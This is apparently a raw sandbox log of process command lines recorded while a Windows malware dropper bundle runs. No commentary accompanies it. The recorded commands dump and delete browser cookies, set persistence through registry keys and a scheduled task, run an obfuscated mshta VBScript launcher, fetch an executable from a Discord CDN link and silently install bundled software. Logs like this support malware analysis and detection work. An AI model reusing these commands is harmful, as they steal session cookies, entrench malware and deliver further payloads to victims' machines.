C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 688 -p 3068 -ip 3068
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3068 -s 2404
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-TMPCK.tmp\Setup.tmp" /SL5="$30634,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-ET58Q.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Users\Admin\AppData\Local\Temp\build.exe
"C:\Users\Admin\AppData\Local\Temp\build.exe"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe
"C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 6224 -ip 6224
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6224 -s 300
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe
"C:\Users\Admin\Documents\Nd_tCvBxyCqjxaKpTy7uzCrF.exe"
C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe
"C:\Users\Admin\Documents\Q6X63W4DaxWwu8nlhr_IKmLa.exe"
C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe
"C:\Users\Admin\Documents\QvnNIL5ksevghLY9sId6enK4.exe"
C:\Users\Admin\Documents\w6B3UjThhNDqEtthqxJ3svMb.exe
"C:\Users\Admin\Documents\w6B3UjThhNDqEtthqxJ3svMb.exe"
C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe
"C:\Users\Admin\Documents\SVzPjmmtaOBGm0pqcQuZdnkT.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe
"C:\Users\Admin\Documents\yWQYlqeOPh4GXxK1EXLWj9CZ.exe"
C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe
"C:\Users\Admin\Documents\1FmfLH5Ur6FIDBTOHluWSgeX.exe"
C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe
"C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe"
C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe
"C:\Users\Admin\Documents\qfQuJDWI8e2iMeWnRendOuGg.exe"
C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe
"C:\Users\Admin\Documents\dnR4Dsm6tzLaz7X7Zl6o7ZVh.exe"
C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe
"C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"
C:\Users\Admin\Documents\5PHrHdXy1yfC_ps2WN1SOALf.exe
"C:\Users\Admin\Documents\5PHrHdXy1yfC_ps2WN1SOALf.exe"
C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe
"C:\Users\Admin\Documents\JwbLVpobsEhX2A92obT90Pyb.exe"
C:\Users\Admin\Documents\agfexAnKA1oUxycqOGAUxLYF.exe
"C:\Users\Admin\Documents\agfexAnKA1oUxycqOGAUxLYF.exe"
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe
"C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe"
C:\Users\Admin\Documents\YUs9jX1IbniC2KRM5sKUM1tM.exe
"C:\Users\Admin\Documents\YUs9jX1IbniC2KRM5sKUM1tM.exe"
C:\Users\Admin\Documents\opZdg0g1v18HkIOYEqOXDcuo.exe
"C:\Users\Admin\Documents\opZdg0g1v18HkIOYEqOXDcuo.exe"
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
"C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe"
C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe
"C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe"
C:\Users\Admin\AppData\Local\Temp\1EA4.exe
C:\Users\Admin\AppData\Local\Temp\1EA4.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Users\Admin\Documents\BDIwGCewawmAhFUuNg_oKIve.exe
"C:\Users\Admin\Documents\BDIwGCewawmAhFUuNg_oKIve.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 279FFDE479372B911766C46CDB544E8E C
C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe
"C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rnyuf.exe /TR "C:\Users\Admin\AppData\Local\Temp\5c436eadc6\rnyuf.exe" /F
C:\Users\Admin\AppData\Local\Temp\is-FNKOP.tmp\wIcE002YY2ayjKvpQQyfkG1Z.tmp
"C:\Users\Admin\AppData\Local\Temp\is-FNKOP.tmp\wIcE002YY2ayjKvpQQyfkG1Z.tmp" /SL5="$20404,138429,56832,C:\Users\Admin\Documents\wIcE002YY2ayjKvpQQyfkG1Z.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\Documents\T6BHTnG0hauRPpfec2b3oW31.exe
"C:\Users\Admin\Documents\T6BHTnG0hauRPpfec2b3oW31.exe"
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 6040 -ip 6040
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\3287.bat C:\Users\Admin\Documents\9MkYFncrckrEGJHHfWF5Sd_v.exe"
C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe
"C:\Users\Admin\Documents\sDbLsfKmNulpdFRqs28XqruC.exe"
C:\Users\Admin\AppData\Local\Temp\39FD.exe
C:\Users\Admin\AppData\Local\Temp\39FD.exe
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding E6F38E0E962E1FD2806B177870B624EA
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 432 -ip 432
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 6040 -s 2316
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 7592 -ip 7592
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 276
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
C:\Users\Admin\Documents\CdAl2BZjIMY0zjhqueqmQYcf.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\vvjo3To3McmuJURKyokLlMkX.exe" ) do taskkill -im "%~NXj" -f
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
"C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe"
C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\5c436eadc6\
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5548 -s 316
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 7824 -ip 7824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7592 -s 280
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5548 -ip 5548
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 7972 -ip 7972
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4772 -ip 4772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5900 -ip 5900
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "vvjo3To3McmuJURKyokLlMkX.exe" -f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-M3SAO.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\2310645.exe
"C:\Users\Admin\AppData\Roaming\2310645.exe"
C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe
"C:\Users\Admin\Documents\JBwSO_lKNHr81ujmyBdTFXwH.exe" -q
C:\Users\Admin\AppData\Roaming\1037051.exe
"C:\Users\Admin\AppData\Roaming\1037051.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 2580 -ip 2580
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Roaming\4911106.exe
"C:\Users\Admin\AppData\Roaming\4911106.exe"
C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5EM48.tmp\Setup.tmp" /SL5="$20708,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-KEPIN.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\1151040.exe
"C:\Users\Admin\AppData\Roaming\1151040.exe"
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe
"C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe" /VERYSILENT
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-8CVR2.tmp\{app}\vdi_compiler"
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-O6RF9.tmp\ultramediaburner.tmp" /SL5="$207B6,281924,62464,C:\Program Files\Windows NT\HIGDTFAAJD\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\75-133fe-5d1-af395-88462b1a2a6a8\Xykydakaero.exe
"C:\Users\Admin\AppData\Local\Temp\75-133fe-5d1-af395-88462b1a2a6a8\Xykydakaero.exe"
C:\Users\Admin\AppData\Local\Temp\bf-43bff-fe0-828a7-de9d2d2d0cda3\Bivaegeneki.exe
"C:\Users\Admin\AppData\Local\Temp\bf-43bff-fe0-828a7-de9d2d2d0cda3\Bivaegeneki.exe"
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6556 -ip 6556
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4940 -ip 4940
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 1212 -ip 1212
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4940 -s 236
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1212 -s 276
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6556 -s 2404
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
C:\Users\Admin\AppData\Local\Temp\11708\DES6_6_6.exe
DES6_6_6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 456
C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-6136Q.tmp\Setup.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 732 -p 1248 -ip 1248
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\3285.tmp\3286.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq&cid=74449¶m=721
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x174,0x1f0,0x7ffb4afa46f8,0x7ffb4afa4708,0x7ffb4afa4718
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 624 -p 1580 -ip 1580
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A79D56B9BEAC24017639E7F7F8D28B0D C
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2668 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3164 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3172 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1580 -s 2456
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1
C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe
"C:\Users\Admin\Documents\VbXarXO5zyG5V2w41wcfJHxe.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 3992 -ip 3992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3992 -s 2412
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2052,335543546694895579,6485397588220622928,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4452 /prefetch:8
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533761 /qn CAMPAIGN=""710"" " CAMPAIGN="710"
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
